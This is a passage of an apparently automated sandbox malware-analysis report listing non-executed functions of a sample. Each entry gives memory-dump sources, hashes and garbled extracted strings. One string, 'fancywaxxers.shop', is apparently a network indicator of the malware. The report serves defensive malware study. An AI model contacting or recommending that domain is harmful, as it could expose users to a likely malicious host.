                                                                                        • Instruction Fuzzy Hash: E2D017B028411E9BDB405F6488096DE3A64FF42326F754604FCA6D6EC5CA720C10DA14

                                                                                        Non-executed Functions

                                                                                        Function 007D238D Relevance: 13.0, Strings: 10, Instructions: 549COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: "0}$%<$$(99#$OIE{$Z_-c$fancywaxxers.shop$gM$-A+$~|$?'
                                                                                        • API String ID: 0-1394294594
                                                                                        • Opcode ID: 0cf8c70487554d8f51f76ed0a45d6881eec3c369fa015aabbc7ddff471176dea
                                                                                        • Instruction ID: 0febef3719303f7da51cb520667fbed964891fa38f452a2cadb17abf1f7f0500
                                                                                        • Opcode Fuzzy Hash: 0cf8c70487554d8f51f76ed0a45d6881eec3c369fa015aabbc7ddff471176dea
                                                                                        • Instruction Fuzzy Hash: 3D026C715183918FD314CF25C89176BBBE2FBD2314F188A6CE4D59B396D7798806CB82
                                                                                        Function 007C11E9 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 499COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ($?$f$u$}
                                                                                        • API String ID: 0-3561895482
                                                                                        • Opcode ID: 49502e5ab74bdf3564ffe81497f1a16f8bd36b6f9ef1b15abcdcd0900b2db59c
                                                                                        • Instruction ID: df0b7249b104ad86ee8dbf20df147c70d2d4f754b2b6011dc1c740d74e13efd1
                                                                                        • Opcode Fuzzy Hash: 49502e5ab74bdf3564ffe81497f1a16f8bd36b6f9ef1b15abcdcd0900b2db59c
                                                                                        • Instruction Fuzzy Hash: 6612A47160C7808BC364DF38C4957AEBBE1AFD6320F598A7DE4D997392D63889418B43
                                                                                        Function 007B9140 Relevance: 10.4, Strings: 8, Instructions: 415COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 2&!w$EW4$IIMC$O!);$T##"$T##"$uP$yt
                                                                                        • API String ID: 0-2143932533
                                                                                        • Opcode ID: 09effc1b13daa91b72845bbbe66f33b8a5e808bbdc37d5409809ad00b593fd89
                                                                                        • Instruction ID: 15bb3248628409d272da6ca9d4c93a1b7cc9c185f3d667a7aba2828ac4c70083
                                                                                        • Opcode Fuzzy Hash: 09effc1b13daa91b72845bbbe66f33b8a5e808bbdc37d5409809ad00b593fd89
                                                                                        • Instruction Fuzzy Hash: A9C1F47160C3918AD725CF3984903ABBFE1AF93354F18896DE5E59B382D23DC90AC752
                                                                                        Function 0098426C Relevance: 10.4, Strings: 7, Instructions: 1620COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 65a$9%?$COw/$M*si$O_?u$l,n{$}?
                                                                                        • API String ID: 0-2796996607
                                                                                        • Opcode ID: 8e6e38a4e43d5fac2778eaf55a76f2628cb920753e4f02ba678c58a093b89dfa
                                                                                        • Instruction ID: 176e66a3dd018184fabf6f385c80b660f244562afd37860a7e05e4d0e9c28f45
                                                                                        • Opcode Fuzzy Hash: 8e6e38a4e43d5fac2778eaf55a76f2628cb920753e4f02ba678c58a093b89dfa
                                                                                        • Instruction Fuzzy Hash: 7BB2F4F36082049FE704AE29EC8567AFBE9EF94320F1A493DE6C4C7744E63598058797
                                                                                        Function 007E8040 Relevance: 10.2, Strings: 8, Instructions: 194COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: %$&$9$<$R$T$W$b
                                                                                        • API String ID: 0-3780034300
                                                                                        • Opcode ID: 1461b86cfa4d3767ede56ba77eb50cf2841e928c2e72e09b72740e390ede6aa9
                                                                                        • Instruction ID: 240b73bbce379718b3a556962ac953e639dd61d8309820e7bdc784093930c52a
                                                                                        • Opcode Fuzzy Hash: 1461b86cfa4d3767ede56ba77eb50cf2841e928c2e72e09b72740e390ede6aa9
                                                                                        • Instruction Fuzzy Hash: 7A71912150D7C28ED351867D484425BAFD26BE7234F2C8FACE5E9873D3C56AC50A9363
                                                                                        Function 007D6360 Relevance: 6.9, Strings: 5, Instructions: 628COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Sin;$YzW+$dMKP$lmeH$xHLG
                                                                                        • API String ID: 0-2485238161
                                                                                        • Opcode ID: 92cfa172f8a44bf73de0843000adf2446a35c55ea8aff51b7af646726bf330a3
                                                                                        • Instruction ID: db460865c0ae1ae6e5113c8972c1153d3d590b6d32cf1603bd1f1a726516a0e4
                                                                                        • Opcode Fuzzy Hash: 92cfa172f8a44bf73de0843000adf2446a35c55ea8aff51b7af646726bf330a3
                                                                                        • Instruction Fuzzy Hash: B1221FB16083818FD7149F28D85136BBBE1EBC6304F08896EE5D59B382E779D905CB92
                                                                                        Function 007CC3CC Relevance: 4.3, Strings: 3, Instructions: 574COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: :G!A$Vw1q${u
                                                                                        • API String ID: 0-645793561
                                                                                        • Opcode ID: eb9a61f572f99eab07660f2be7400b593527c3fb04ab9fd56d00ebc0949f0af5
                                                                                        • Instruction ID: ef68929b3e8cc3f998d1c66d4e99579e6f017c1f7d02d80313965a6a6104e6be
                                                                                        • Opcode Fuzzy Hash: eb9a61f572f99eab07660f2be7400b593527c3fb04ab9fd56d00ebc0949f0af5
                                                                                        • Instruction Fuzzy Hash: DA0232B190021ACFDB15CF64C891ABBBBB1FF55310F18855CE859AB352E338A952CBD1
                                                                                        Function 0084F194 Relevance: 4.2, Strings: 3, Instructions: 439COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ]#WN$_%s=$zz~
                                                                                        • API String ID: 0-2772061215
                                                                                        • Opcode ID: 5c1626e00f52a39507e81ec99a959fd5a5e930613ed37ed9a17b7d62e93b0931
                                                                                        • Instruction ID: fe5e38471c45d9a192ea59018e5c3bd02e82b357811d45e06d1f75a2e08b1470
                                                                                        • Opcode Fuzzy Hash: 5c1626e00f52a39507e81ec99a959fd5a5e930613ed37ed9a17b7d62e93b0931
                                                                                        • Instruction Fuzzy Hash: 84E1F5B7E046148BF3445E29DC84366B7D2EBD5720F2B853CDA889B3C4D93E9C0A8785
                                                                                        Function 007D6340 Relevance: 3.2, Strings: 2, Instructions: 688COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: H/'&$ur
                                                                                        • API String ID: 0-969745386
                                                                                        • Opcode ID: 8c24c0f4d3b73d3dcd747f0d05901d0ebeef0fac03a43f3aecd9681b021b627e
                                                                                        • Instruction ID: f9aff86bd3cc36e7c4372ac86a030a5ccdff95c1115e2bafa86d6e79a233e539
                                                                                        • Opcode Fuzzy Hash: 8c24c0f4d3b73d3dcd747f0d05901d0ebeef0fac03a43f3aecd9681b021b627e
                                                                                        • Instruction Fuzzy Hash: C8320672A083518BD728DF29D85176BB7E2EFC5310F09857DE8899B391EB74AC01C786
                                                                                        Function 008681AE Relevance: 3.0, Strings: 2, Instructions: 538COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: `r]$hSN#
                                                                                        • API String ID: 0-3132102705
                                                                                        • Opcode ID: 75e9cf17b1b67a163edf54f46cc3d0446550cac62dde3f441a3ced80b287362f
                                                                                        • Instruction ID: 3919530eb4db5539ae7131176d72b8538650703ecb01254c327aa57046018605
                                                                                        • Opcode Fuzzy Hash: 75e9cf17b1b67a163edf54f46cc3d0446550cac62dde3f441a3ced80b287362f
                                                                                        • Instruction Fuzzy Hash: 1C02E0F3F146244BF3484938DC99366B696DBA4321F2F823D9F89A77C5E87E5C094284
                                                                                        Function 008221A2 Relevance: 3.0, Strings: 2, Instructions: 455COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ="g($f@or
                                                                                        • API String ID: 0-556951699
                                                                                        • Opcode ID: 659fc639d7d57e01b701b50871541006bf62cb11d9ddade6e97ab2ebc0e39b32
                                                                                        • Instruction ID: 598dfcab697b9145ebd0b5bfc834a9252b4f31983cb875c5d493e2644b8b4470
                                                                                        • Opcode Fuzzy Hash: 659fc639d7d57e01b701b50871541006bf62cb11d9ddade6e97ab2ebc0e39b32
                                                                                        • Instruction Fuzzy Hash: 8CE1CCF3F506244BF3444979DC98366B692DB94324F2F823C8F98AB3C5D97E9D0A4284
                                                                                        Function 0086635B Relevance: 2.9, Strings: 2, Instructions: 442COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: WOgy$klG
                                                                                        • API String ID: 0-576771951
                                                                                        • Opcode ID: 3fa7bf094efc4d28df07e4b11c3c12c9dacd1322c84100a450320ceecfc9a567
                                                                                        • Instruction ID: 15f7393b22f29bc9cbd7444face2775afd8e889f4926f13c2986289dac6c0f08
                                                                                        • Opcode Fuzzy Hash: 3fa7bf094efc4d28df07e4b11c3c12c9dacd1322c84100a450320ceecfc9a567
                                                                                        • Instruction Fuzzy Hash: E7E1DFF3F146144BF3445E38DC983BA7692EB94320F1B823D9B899B7C4E97E58098385
